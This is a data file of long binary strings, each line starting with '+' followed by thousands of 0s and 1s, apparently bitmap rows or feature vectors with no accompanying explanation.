+111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000100000000000100000000100000010110000000110000000000000000000000000000100100000000100000011000010000010001000000000000000010000100100100000000100000010100000100000001000000000000000010000000100100000000100000011000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001101000010101010111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001101000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000110000000000000000000111100000000110100100000001100000000011111000000000000000000111100000000110100100000001101100000010010000000000100101100111100000000110100100110001101000110010010010010000000000000111100000000110100100000001100000000010010000000000000000000000100000001000001000000001101000000010010000000000000000000000000000000000000000000000000000000000000001101100011100100111111111111111111111111111111111111111111111111 +111100000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000001000000000100100000000000000000100000000000000000000000000000000000000000000000000000000000100000000000000000000000010000000000000000000000000000000000100000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000110011010110001111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000001100000000000000000001000000010000000110000000000100000001000000000000000000000001000000010000000110000000000000000000100000000000000000110001000000010000000110000000000010000001000001000000000000000001000000010000000110000000000100000001000000000000000000000000000000000100000000000000000100000001000000000000000000000000000000000000000000000000000000000000000000101110110001001111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100100000000100000000000000000000000000000000000000000000000100100000000100000000000000000000000000100000000100000010000100100000000100000000000010001000100000010000100000000000000100100000000100000000000000000000000000010000000000000000001000000000000000010000000000000000000000010000000000000000000000000000000000000000000000000000000000000001110111010010010111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010010000000000000000000000000000000000000000000000000000000000000000000000000000000000110000000111100000000011000000111111110001111000000000000000110000000111100000001111000000111111110001111000000000000001111000000111101100101111000001111111110001110000000000000000110000000100101100101110011000111111110001100000001100000000000000000000001101100000000000110000100001001000000000000000000000000000000000000000000000000000000000000000000000100000101101010111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000001000000000100000001001000000000000000000000000001000000000001000000000100100001001000000000000000010000000001000000001010010000000000010001000000000000000000000000000000000000001000000000010100000001000000000001000000000000000000000000000000000000001000000000001000000000000000000000000000000000000000000000000000000000000000000000000001100001100001111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000100000000000000000000001000101100010000000000000010000000000100000000000010000001000000101100010000000000000000100000000100000000001000000000001000101100010000000000000010000000000100000000000010000000001000101100010000000000000000000000000000000000000000000000100010000000010000000000000000000000000000000000000000000000000000000000000000000001010011100011100111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000100100000000010000000100100000001010000000000000000100000000100100000001010000000000010000001010000000000000001010000000100100000010000000000001000000001100000000000000000100000000100000000001100000010100100000001000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000110000011001000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000110111101000000000000001011110111101111010000000000000000000110111101000000000000001011110111101111010000000000000010001110111101000000000000001011110111101111010000000000000000000110111101000000000000001011110110011111110000000000000000000000000000000000000000000111111111111111100000000000000000000000000000000000000000000000000000000000000000000000000000001110011011010111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001011011000000000000001101101000010110110000000000000000000001011011000000000000001101101000010110110000000000000110011001011011000000000000001101101000010110110000000000000000000001011011000000000000001101101000011111110000000000000000000000000000000000000000000000000000101010100000000000000000000000000000000000000000000000000000000000000000000000000000010111001010110111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111000000000000001101101000010110110000000000000000000001011011000000000000001101101000010110110000000000011110011001011011000000000000001101101000010110110000000000000000000001011011000000000000001101101000010110110000000000000000000000000000000000000000000010000000101010100000000000000000000000000000000000000000000000000000000000000000000000000001101101101001100111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111000000000000001011110111101111010000000000000000000110111101000000000000001011110111101111010000000000011110001110111101000000000000001011110111101111010000000000000000000110111101000000000000001011110111101111010000000000000000000000000000000000000000000111111111111111100000000000000000000000000000000000000000000000000000000000000000000000000001010010001101010111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000101110000000001000000000000000000000001000000000000000001000000010100110000000000000000000011000000000100000001100000010010001010010000000000000000000000000000000000000001100000000000000000000000000000000100000000000000000000000000000000000001111101111101000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001100001000000000000000000000000000000100000000000000000000000000001000000000000000000000000001000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000111011111000101111111111111111111111111111111111111111111111111 